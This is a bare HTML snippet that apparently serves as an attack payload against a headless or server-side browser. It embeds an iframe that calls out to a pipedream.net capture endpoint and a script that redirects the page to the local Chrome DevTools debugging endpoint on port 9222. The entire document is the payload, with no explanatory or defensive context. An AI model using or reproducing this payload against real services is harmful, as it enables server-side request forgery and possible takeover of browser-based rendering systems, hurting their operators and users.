<div style="width: 100%; height: 500px; background-color: white;">
  <iframe src="https://e1d544a9b90cb618dc510cc0acca74af.m.pipedream.net/xyz" width="800" height="500" ></iframe>
  <script>window.location="http://localhost:9222/json"</script>
</div>
